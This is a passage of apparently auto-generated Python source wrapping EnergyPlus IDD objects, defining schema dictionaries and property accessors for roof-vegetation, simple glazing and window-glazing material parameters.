def thermal_resistance(self, value=None):
"""Corresponds to IDD field `Thermal Resistance`"""
self["Thermal Resistance"] = value
class MaterialRoofVegetation(DataObject):
""" Corresponds to IDD object `Material:RoofVegetation`
EcoRoof model, plant layer plus soil layer
Implemented by Portland State University
(Sailor et al., January, 2007)
only one material must be referenced per simulation though the same EcoRoof material could be
used in multiple constructions. New moisture redistribution scheme (2010) requires higher
number of timesteps per hour (minimum 12 recommended).
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'height of plants',
{'name': u'Height of Plants',
'pyname': u'height_of_plants',
'default': 0.2,
'minimum>': 0.005,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'leaf area index',
{'name': u'Leaf Area Index',
'pyname': u'leaf_area_index',
'default': 1.0,
'minimum>': 0.001,
'maximum': 5.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'leaf reflectivity',
{'name': u'Leaf Reflectivity',
'pyname': u'leaf_reflectivity',
'default': 0.22,
'maximum': 0.5,
'required-field': True,
'autosizable': False,
'minimum': 0.05,
'autocalculatable': False,
'type': u'real',
'unit': u'dimensionless'}),
(u'leaf emissivity',
{'name': u'Leaf Emissivity',
'pyname': u'leaf_emissivity',
'default': 0.95,
'maximum': 1.0,
'required-field': True,
'autosizable': False,
'minimum': 0.8,
'autocalculatable': False,
'type': u'real'}),
(u'minimum stomatal resistance',
{'name': u'Minimum Stomatal Resistance',
'pyname': u'minimum_stomatal_resistance',
'default': 180.0,
'maximum': 300.0,
'required-field': False,
'autosizable': False,
'minimum': 50.0,
'autocalculatable': False,
'type': u'real',
'unit': u's/m'}),
(u'soil layer name',
{'name': u'Soil Layer Name',
'pyname': u'soil_layer_name',
'default': u'Green Roof Soil',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'roughness',
{'name': u'Roughness',
'pyname': u'roughness',
'default': u'MediumRough',
'required-field': True,
'autosizable': False,
'accepted-values': [u'VeryRough',
u'MediumRough',
u'Rough',
u'Smooth',
u'MediumSmooth',
u'VerySmooth'],
'autocalculatable': False,
'type': 'alpha'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'default': 0.1,
'minimum>': 0.05,
'maximum': 0.7,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'conductivity of dry soil',
{'name': u'Conductivity of Dry Soil',
'pyname': u'conductivity_of_dry_soil',
'default': 0.35,
'maximum': 1.5,
'required-field': True,
'autosizable': False,
'minimum': 0.2,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'density of dry soil',
{'name': u'Density of Dry Soil',
'pyname': u'density_of_dry_soil',
'default': 1100.0,
'maximum': 2000.0,
'required-field': True,
'autosizable': False,
'minimum': 300.0,
'autocalculatable': False,
'type': u'real',
'unit': u'kg/m3'}),
(u'specific heat of dry soil',
{'name': u'Specific Heat of Dry Soil',
'pyname': u'specific_heat_of_dry_soil',
'default': 1200.0,
'minimum>': 500.0,
'maximum': 2000.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'J/kg-K'}),
(u'thermal absorptance',
{'name': u'Thermal Absorptance',
'pyname': u'thermal_absorptance',
'default': 0.9,
'minimum>': 0.8,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar absorptance',
{'name': u'Solar Absorptance',
'pyname': u'solar_absorptance',
'default': 0.7,
'maximum': 0.9,
'required-field': False,
'autosizable': False,
'minimum': 0.4,
'autocalculatable': False,
'type': u'real'}),
(u'visible absorptance',
{'name': u'Visible Absorptance',
'pyname': u'visible_absorptance',
'default': 0.75,
'minimum>': 0.5,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'saturation volumetric moisture content of the soil layer',
{'name': u'Saturation Volumetric Moisture Content of the Soil Layer',
'pyname': u'saturation_volumetric_moisture_content_of_the_soil_layer',
'default': 0.3,
'minimum>': 0.1,
'maximum': 0.5,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'residual volumetric moisture content of the soil layer',
{'name': u'Residual Volumetric Moisture Content of the Soil Layer',
'pyname': u'residual_volumetric_moisture_content_of_the_soil_layer',
'default': 0.01,
'maximum': 0.1,
'required-field': False,
'autosizable': False,
'minimum': 0.01,
'autocalculatable': False,
'type': u'real'}),
(u'initial volumetric moisture content of the soil layer',
{'name': u'Initial Volumetric Moisture Content of the Soil Layer',
'pyname': u'initial_volumetric_moisture_content_of_the_soil_layer',
'default': 0.1,
'minimum>': 0.05,
'maximum': 0.5,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'moisture diffusion calculation method',
{'name': u'Moisture Diffusion Calculation Method',
'pyname': u'moisture_diffusion_calculation_method',
'default': u'Advanced',
'required-field': False,
'autosizable': False,
'accepted-values': [u'Simple',
u'Advanced'],
'autocalculatable': False,
'type': 'alpha'})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 18,
'name': u'Material:RoofVegetation',
'pyname': u'MaterialRoofVegetation',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def height_of_plants(self):
"""field `Height of Plants`
| The ecoroof module is designed for short plants and shrubs.
| Units: m
| Default value: 0.2
| value > 0.005
| value <= 1.0
Args:
value (float): value for IDD Field `Height of Plants`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `height_of_plants` or None if not set
"""
return self["Height of Plants"]
@height_of_plants.setter
def height_of_plants(self, value=0.2):
"""Corresponds to IDD field `Height of Plants`"""
self["Height of Plants"] = value
@property
def leaf_area_index(self):
"""field `Leaf Area Index`
| Entire surface is assumed covered, so decrease LAI accordingly.
| Units: dimensionless
| Default value: 1.0
| value > 0.001
| value <= 5.0
Args:
value (float): value for IDD Field `Leaf Area Index`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leaf_area_index` or None if not set
"""
return self["Leaf Area Index"]
@leaf_area_index.setter
def leaf_area_index(self, value=1.0):
"""Corresponds to IDD field `Leaf Area Index`"""
self["Leaf Area Index"] = value
@property
def leaf_reflectivity(self):
"""field `Leaf Reflectivity`
| Leaf reflectivity (albedo) is typically 0.18-0.25
| Units: dimensionless
| Default value: 0.22
| value >= 0.05
| value <= 0.5
Args:
value (float): value for IDD Field `Leaf Reflectivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leaf_reflectivity` or None if not set
"""
return self["Leaf Reflectivity"]
@leaf_reflectivity.setter
def leaf_reflectivity(self, value=0.22):
"""Corresponds to IDD field `Leaf Reflectivity`"""
self["Leaf Reflectivity"] = value
@property
def leaf_emissivity(self):
"""field `Leaf Emissivity`
| Default value: 0.95
| value >= 0.8
| value <= 1.0
Args:
value (float): value for IDD Field `Leaf Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `leaf_emissivity` or None if not set
"""
return self["Leaf Emissivity"]
@leaf_emissivity.setter
def leaf_emissivity(self, value=0.95):
"""Corresponds to IDD field `Leaf Emissivity`"""
self["Leaf Emissivity"] = value
@property
def minimum_stomatal_resistance(self):
"""field `Minimum Stomatal Resistance`
| This depends upon plant type
| Units: s/m
| Default value: 180.0
| value >= 50.0
| value <= 300.0
Args:
value (float): value for IDD Field `Minimum Stomatal Resistance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `minimum_stomatal_resistance` or None if not set
"""
return self["Minimum Stomatal Resistance"]
@minimum_stomatal_resistance.setter
def minimum_stomatal_resistance(self, value=180.0):
"""Corresponds to IDD field `Minimum Stomatal Resistance`"""
self["Minimum Stomatal Resistance"] = value
@property
def soil_layer_name(self):
"""field `Soil Layer Name`
| Default value: Green Roof Soil
Args:
value (str): value for IDD Field `Soil Layer Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `soil_layer_name` or None if not set
"""
return self["Soil Layer Name"]
@soil_layer_name.setter
def soil_layer_name(self, value="Green Roof Soil"):
"""Corresponds to IDD field `Soil Layer Name`"""
self["Soil Layer Name"] = value
@property
def roughness(self):
"""field `Roughness`
| Default value: MediumRough
Args:
value (str): value for IDD Field `Roughness`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `roughness` or None if not set
"""
return self["Roughness"]
@roughness.setter
def roughness(self, value="MediumRough"):
"""Corresponds to IDD field `Roughness`"""
self["Roughness"] = value
@property
def thickness(self):
"""field `Thickness`
| thickness of the soil layer of the EcoRoof
| Soil depths of 0.15m (6in) and 0.30m (12in) are common.
| Units: m
| IP-Units: in
| Default value: 0.1
| value > 0.05
| value <= 0.7
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=0.1):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def conductivity_of_dry_soil(self):
"""field `Conductivity of Dry Soil`
| Thermal conductivity of dry soil.
| Typical ecoroof soils range from 0.3 to 0.5
| Units: W/m-K
| Default value: 0.35
| value >= 0.2
| value <= 1.5
Args:
value (float): value for IDD Field `Conductivity of Dry Soil`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `conductivity_of_dry_soil` or None if not set
"""
return self["Conductivity of Dry Soil"]
@conductivity_of_dry_soil.setter
def conductivity_of_dry_soil(self, value=0.35):
"""Corresponds to IDD field `Conductivity of Dry Soil`"""
self["Conductivity of Dry Soil"] = value
@property
def density_of_dry_soil(self):
"""field `Density of Dry Soil`
| Density of dry soil (the code modifies this as the soil becomes moist)
| Typical ecoroof soils range from 400 to 1000 (dry to wet)
| Units: kg/m3
| Default value: 1100.0
| value >= 300.0
| value <= 2000.0
Args:
value (float): value for IDD Field `Density of Dry Soil`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `density_of_dry_soil` or None if not set
"""
return self["Density of Dry Soil"]
@density_of_dry_soil.setter
def density_of_dry_soil(self, value=1100.0):
"""Corresponds to IDD field `Density of Dry Soil`"""
self["Density of Dry Soil"] = value
@property
def specific_heat_of_dry_soil(self):
"""field `Specific Heat of Dry Soil`
| Specific heat of dry soil
| Units: J/kg-K
| Default value: 1200.0
| value > 500.0
| value <= 2000.0
Args:
value (float): value for IDD Field `Specific Heat of Dry Soil`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `specific_heat_of_dry_soil` or None if not set
"""
return self["Specific Heat of Dry Soil"]
@specific_heat_of_dry_soil.setter
def specific_heat_of_dry_soil(self, value=1200.0):
"""Corresponds to IDD field `Specific Heat of Dry Soil`"""
self["Specific Heat of Dry Soil"] = value
@property
def thermal_absorptance(self):
"""field `Thermal Absorptance`
| Soil emissivity is typically in range of 0.90 to 0.98
| Default value: 0.9
| value > 0.8
| value <= 1.0
Args:
value (float): value for IDD Field `Thermal Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thermal_absorptance` or None if not set
"""
return self["Thermal Absorptance"]
@thermal_absorptance.setter
def thermal_absorptance(self, value=0.9):
"""Corresponds to IDD field `Thermal Absorptance`"""
self["Thermal Absorptance"] = value
@property
def solar_absorptance(self):
"""field `Solar Absorptance`
| Solar absorptance of dry soil (1-albedo) is typically 0.60 to 0.85
| corresponding to a dry albedo of 0.15 to 0.40
| Default value: 0.7
| value >= 0.4
| value <= 0.9
Args:
value (float): value for IDD Field `Solar Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_absorptance` or None if not set
"""
return self["Solar Absorptance"]
@solar_absorptance.setter
def solar_absorptance(self, value=0.7):
"""Corresponds to IDD field `Solar Absorptance`"""
self["Solar Absorptance"] = value
@property
def visible_absorptance(self):
"""field `Visible Absorptance`
| Default value: 0.75
| value > 0.5
| value <= 1.0
Args:
value (float): value for IDD Field `Visible Absorptance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_absorptance` or None if not set
"""
return self["Visible Absorptance"]
@visible_absorptance.setter
def visible_absorptance(self, value=0.75):
"""Corresponds to IDD field `Visible Absorptance`"""
self["Visible Absorptance"] = value
@property
def saturation_volumetric_moisture_content_of_the_soil_layer(self):
"""field `Saturation Volumetric Moisture Content of the Soil Layer`
| Maximum moisture content is typically less than 0.5
| Default value: 0.3
| value > 0.1
| value <= 0.5
Args:
value (float): value for IDD Field `Saturation Volumetric Moisture Content of the Soil Layer`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `saturation_volumetric_moisture_content_of_the_soil_layer` or None if not set
"""
return self["Saturation Volumetric Moisture Content of the Soil Layer"]
@saturation_volumetric_moisture_content_of_the_soil_layer.setter
def saturation_volumetric_moisture_content_of_the_soil_layer(
self,
value=0.3):
"""Corresponds to IDD field `Saturation Volumetric Moisture Content of
the Soil Layer`"""
self[
"Saturation Volumetric Moisture Content of the Soil Layer"] = value
@property
def residual_volumetric_moisture_content_of_the_soil_layer(self):
"""field `Residual Volumetric Moisture Content of the Soil Layer`
| Default value: 0.01
| value >= 0.01
| value <= 0.1
Args:
value (float): value for IDD Field `Residual Volumetric Moisture Content of the Soil Layer`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `residual_volumetric_moisture_content_of_the_soil_layer` or None if not set
"""
return self["Residual Volumetric Moisture Content of the Soil Layer"]
@residual_volumetric_moisture_content_of_the_soil_layer.setter
def residual_volumetric_moisture_content_of_the_soil_layer(
self,
value=0.01):
"""Corresponds to IDD field `Residual Volumetric Moisture Content of
the Soil Layer`"""
self["Residual Volumetric Moisture Content of the Soil Layer"] = value
@property
def initial_volumetric_moisture_content_of_the_soil_layer(self):
"""field `Initial Volumetric Moisture Content of the Soil Layer`
| Default value: 0.1
| value > 0.05
| value <= 0.5
Args:
value (float): value for IDD Field `Initial Volumetric Moisture Content of the Soil Layer`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `initial_volumetric_moisture_content_of_the_soil_layer` or None if not set
"""
return self["Initial Volumetric Moisture Content of the Soil Layer"]
@initial_volumetric_moisture_content_of_the_soil_layer.setter
def initial_volumetric_moisture_content_of_the_soil_layer(self, value=0.1):
"""Corresponds to IDD field `Initial Volumetric Moisture Content of the
Soil Layer`"""
self["Initial Volumetric Moisture Content of the Soil Layer"] = value
@property
def moisture_diffusion_calculation_method(self):
"""field `Moisture Diffusion Calculation Method`
| Advanced calculation requires increased number of timesteps (recommended >20).
| Default value: Advanced
Args:
value (str): value for IDD Field `Moisture Diffusion Calculation Method`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `moisture_diffusion_calculation_method` or None if not set
"""
return self["Moisture Diffusion Calculation Method"]
@moisture_diffusion_calculation_method.setter
def moisture_diffusion_calculation_method(self, value="Advanced"):
"""Corresponds to IDD field `Moisture Diffusion Calculation Method`"""
self["Moisture Diffusion Calculation Method"] = value
class WindowMaterialSimpleGlazingSystem(DataObject):
""" Corresponds to IDD object `WindowMaterial:SimpleGlazingSystem`
Alternate method of describing windows
This window material object is used to define an entire glazing system
using simple performance parameters.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'u-factor',
{'name': u'U-Factor',
'pyname': u'ufactor',
'minimum>': 0.0,
'maximum': 7.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'unit': u'W/m2-K'}),
(u'solar heat gain coefficient',
{'name': u'Solar Heat Gain Coefficient',
'pyname': u'solar_heat_gain_coefficient',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'maximum<': 1.0}),
(u'visible transmittance',
{'name': u'Visible Transmittance',
'pyname': u'visible_transmittance',
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': 'real',
'maximum<': 1.0})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 3,
'name': u'WindowMaterial:SimpleGlazingSystem',
'pyname': u'WindowMaterialSimpleGlazingSystem',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def ufactor(self):
"""field `U-Factor`
| Enter U-Factor including film coefficients
| Note that the effective upper limit for U-factor is 5.8 W/m2-K
| Units: W/m2-K
| value <= 7.0
Args:
value (float): value for IDD Field `U-Factor`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `ufactor` or None if not set
"""
return self["U-Factor"]
@ufactor.setter
def ufactor(self, value=None):
""" Corresponds to IDD field `U-Factor`
"""
self["U-Factor"] = value
@property
def solar_heat_gain_coefficient(self):
"""field `Solar Heat Gain Coefficient`
| SHGC at Normal Incidence
| value < 1.0
Args:
value (float): value for IDD Field `Solar Heat Gain Coefficient`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_heat_gain_coefficient` or None if not set
"""
return self["Solar Heat Gain Coefficient"]
@solar_heat_gain_coefficient.setter
def solar_heat_gain_coefficient(self, value=None):
"""Corresponds to IDD field `Solar Heat Gain Coefficient`"""
self["Solar Heat Gain Coefficient"] = value
@property
def visible_transmittance(self):
"""field `Visible Transmittance`
| VT at Normal Incidence
| optional
| value < 1.0
Args:
value (float): value for IDD Field `Visible Transmittance`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_transmittance` or None if not set
"""
return self["Visible Transmittance"]
@visible_transmittance.setter
def visible_transmittance(self, value=None):
"""Corresponds to IDD field `Visible Transmittance`"""
self["Visible Transmittance"] = value
class WindowMaterialGlazing(DataObject):
""" Corresponds to IDD object `WindowMaterial:Glazing`
Glass material properties for Windows or Glass Doors
Transmittance/Reflectance input method.
"""
_schema = {'extensible-fields': OrderedDict(),
'fields': OrderedDict([(u'name',
{'name': u'Name',
'pyname': u'name',
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'alpha'}),
(u'optical data type',
{'name': u'Optical Data Type',
'pyname': u'optical_data_type',
'required-field': True,
'autosizable': False,
'accepted-values': [u'SpectralAverage',
u'Spectral',
u'BSDF'],
'autocalculatable': False,
'type': 'alpha'}),
(u'window glass spectral data set name',
{'name': u'Window Glass Spectral Data Set Name',
'pyname': u'window_glass_spectral_data_set_name',
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'object-list'}),
(u'thickness',
{'name': u'Thickness',
'pyname': u'thickness',
'minimum>': 0.0,
'required-field': True,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'm'}),
(u'solar transmittance at normal incidence',
{'name': u'Solar Transmittance at Normal Incidence',
'pyname': u'solar_transmittance_at_normal_incidence',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side solar reflectance at normal incidence',
{'name': u'Front Side Solar Reflectance at Normal Incidence',
'pyname': u'front_side_solar_reflectance_at_normal_incidence',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side solar reflectance at normal incidence',
{'name': u'Back Side Solar Reflectance at Normal Incidence',
'pyname': u'back_side_solar_reflectance_at_normal_incidence',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'visible transmittance at normal incidence',
{'name': u'Visible Transmittance at Normal Incidence',
'pyname': u'visible_transmittance_at_normal_incidence',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side visible reflectance at normal incidence',
{'name': u'Front Side Visible Reflectance at Normal Incidence',
'pyname': u'front_side_visible_reflectance_at_normal_incidence',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'back side visible reflectance at normal incidence',
{'name': u'Back Side Visible Reflectance at Normal Incidence',
'pyname': u'back_side_visible_reflectance_at_normal_incidence',
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'infrared transmittance at normal incidence',
{'name': u'Infrared Transmittance at Normal Incidence',
'pyname': u'infrared_transmittance_at_normal_incidence',
'default': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'minimum': 0.0,
'autocalculatable': False,
'type': u'real'}),
(u'front side infrared hemispherical emissivity',
{'name': u'Front Side Infrared Hemispherical Emissivity',
'pyname': u'front_side_infrared_hemispherical_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0}),
(u'back side infrared hemispherical emissivity',
{'name': u'Back Side Infrared Hemispherical Emissivity',
'pyname': u'back_side_infrared_hemispherical_emissivity',
'default': 0.84,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0}),
(u'conductivity',
{'name': u'Conductivity',
'pyname': u'conductivity',
'default': 0.9,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'W/m-K'}),
(u'dirt correction factor for solar and visible transmittance',
{'name': u'Dirt Correction Factor for Solar and Visible Transmittance',
'pyname': u'dirt_correction_factor_for_solar_and_visible_transmittance',
'default': 1.0,
'minimum>': 0.0,
'maximum': 1.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real'}),
(u'solar diffusing',
{'name': u'Solar Diffusing',
'pyname': u'solar_diffusing',
'default': u'No',
'required-field': False,
'autosizable': False,
'accepted-values': [u'No',
u'Yes'],
'autocalculatable': False,
'type': 'alpha'}),
(u"young's modulus",
{'name': u"Young's modulus",
'pyname': u'youngs_modulus',
'default': 72000000000.0,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'unit': u'Pa'}),
(u"poisson's ratio",
{'name': u"Poisson's ratio",
'pyname': u'poissons_ratio',
'default': 0.22,
'minimum>': 0.0,
'required-field': False,
'autosizable': False,
'autocalculatable': False,
'type': u'real',
'maximum<': 1.0})]),
'format': None,
'group': u'Surface Construction Elements',
'min-fields': 14,
'name': u'WindowMaterial:Glazing',
'pyname': u'WindowMaterialGlazing',
'required-object': False,
'unique-object': False}
@property
def name(self):
"""field `Name`
Args:
value (str): value for IDD Field `Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `name` or None if not set
"""
return self["Name"]
@name.setter
def name(self, value=None):
"""Corresponds to IDD field `Name`"""
self["Name"] = value
@property
def optical_data_type(self):
"""field `Optical Data Type`
Args:
value (str): value for IDD Field `Optical Data Type`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `optical_data_type` or None if not set
"""
return self["Optical Data Type"]
@optical_data_type.setter
def optical_data_type(self, value=None):
"""Corresponds to IDD field `Optical Data Type`"""
self["Optical Data Type"] = value
@property
def window_glass_spectral_data_set_name(self):
"""field `Window Glass Spectral Data Set Name`
| Used only when Optical Data Type = Spectral
Args:
value (str): value for IDD Field `Window Glass Spectral Data Set Name`
Raises:
ValueError: if `value` is not a valid value
Returns:
str: the value of `window_glass_spectral_data_set_name` or None if not set
"""
return self["Window Glass Spectral Data Set Name"]
@window_glass_spectral_data_set_name.setter
def window_glass_spectral_data_set_name(self, value=None):
"""Corresponds to IDD field `Window Glass Spectral Data Set Name`"""
self["Window Glass Spectral Data Set Name"] = value
@property
def thickness(self):
"""field `Thickness`
| Units: m
| IP-Units: in
Args:
value (float): value for IDD Field `Thickness`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `thickness` or None if not set
"""
return self["Thickness"]
@thickness.setter
def thickness(self, value=None):
"""Corresponds to IDD field `Thickness`"""
self["Thickness"] = value
@property
def solar_transmittance_at_normal_incidence(self):
"""field `Solar Transmittance at Normal Incidence`
| Used only when Optical Data Type = SpectralAverage
| value <= 1.0
Args:
value (float): value for IDD Field `Solar Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `solar_transmittance_at_normal_incidence` or None if not set
"""
return self["Solar Transmittance at Normal Incidence"]
@solar_transmittance_at_normal_incidence.setter
def solar_transmittance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Solar Transmittance at Normal
Incidence`"""
self["Solar Transmittance at Normal Incidence"] = value
@property
def front_side_solar_reflectance_at_normal_incidence(self):
"""field `Front Side Solar Reflectance at Normal Incidence`
| Used only when Optical Data Type = SpectralAverage
| Front Side is side closest to outdoor air
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Solar Reflectance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_solar_reflectance_at_normal_incidence` or None if not set
"""
return self["Front Side Solar Reflectance at Normal Incidence"]
@front_side_solar_reflectance_at_normal_incidence.setter
def front_side_solar_reflectance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Front Side Solar Reflectance at Normal
Incidence`"""
self["Front Side Solar Reflectance at Normal Incidence"] = value
@property
def back_side_solar_reflectance_at_normal_incidence(self):
"""field `Back Side Solar Reflectance at Normal Incidence`
| Used only when Optical Data Type = SpectralAverage
| Back Side is side closest to zone air
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Solar Reflectance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_solar_reflectance_at_normal_incidence` or None if not set
"""
return self["Back Side Solar Reflectance at Normal Incidence"]
@back_side_solar_reflectance_at_normal_incidence.setter
def back_side_solar_reflectance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Back Side Solar Reflectance at Normal
Incidence`"""
self["Back Side Solar Reflectance at Normal Incidence"] = value
@property
def visible_transmittance_at_normal_incidence(self):
"""field `Visible Transmittance at Normal Incidence`
| Used only when Optical Data Type = SpectralAverage
| value <= 1.0
Args:
value (float): value for IDD Field `Visible Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `visible_transmittance_at_normal_incidence` or None if not set
"""
return self["Visible Transmittance at Normal Incidence"]
@visible_transmittance_at_normal_incidence.setter
def visible_transmittance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Visible Transmittance at Normal
Incidence`"""
self["Visible Transmittance at Normal Incidence"] = value
@property
def front_side_visible_reflectance_at_normal_incidence(self):
"""field `Front Side Visible Reflectance at Normal Incidence`
| Used only when Optical Data Type = SpectralAverage
| value <= 1.0
Args:
value (float): value for IDD Field `Front Side Visible Reflectance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_visible_reflectance_at_normal_incidence` or None if not set
"""
return self["Front Side Visible Reflectance at Normal Incidence"]
@front_side_visible_reflectance_at_normal_incidence.setter
def front_side_visible_reflectance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Front Side Visible Reflectance at Normal
Incidence`"""
self["Front Side Visible Reflectance at Normal Incidence"] = value
@property
def back_side_visible_reflectance_at_normal_incidence(self):
"""field `Back Side Visible Reflectance at Normal Incidence`
| Used only when Optical Data Type = SpectralAverage
| value <= 1.0
Args:
value (float): value for IDD Field `Back Side Visible Reflectance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `back_side_visible_reflectance_at_normal_incidence` or None if not set
"""
return self["Back Side Visible Reflectance at Normal Incidence"]
@back_side_visible_reflectance_at_normal_incidence.setter
def back_side_visible_reflectance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Back Side Visible Reflectance at Normal
Incidence`"""
self["Back Side Visible Reflectance at Normal Incidence"] = value
@property
def infrared_transmittance_at_normal_incidence(self):
"""field `Infrared Transmittance at Normal Incidence`
| value <= 1.0
Args:
value (float): value for IDD Field `Infrared Transmittance at Normal Incidence`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `infrared_transmittance_at_normal_incidence` or None if not set
"""
return self["Infrared Transmittance at Normal Incidence"]
@infrared_transmittance_at_normal_incidence.setter
def infrared_transmittance_at_normal_incidence(self, value=None):
"""Corresponds to IDD field `Infrared Transmittance at Normal
Incidence`"""
self["Infrared Transmittance at Normal Incidence"] = value
@property
def front_side_infrared_hemispherical_emissivity(self):
"""field `Front Side Infrared Hemispherical Emissivity`
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Front Side Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
Returns:
float: the value of `front_side_infrared_hemispherical_emissivity` or None if not set
"""
return self["Front Side Infrared Hemispherical Emissivity"]
@front_side_infrared_hemispherical_emissivity.setter
def front_side_infrared_hemispherical_emissivity(self, value=0.84):
"""Corresponds to IDD field `Front Side Infrared Hemispherical
Emissivity`"""
self["Front Side Infrared Hemispherical Emissivity"] = value
@property
def back_side_infrared_hemispherical_emissivity(self):
"""field `Back Side Infrared Hemispherical Emissivity`
| Default value: 0.84
| value < 1.0
Args:
value (float): value for IDD Field `Back Side Infrared Hemispherical Emissivity`
Raises:
ValueError: if `value` is not a valid value
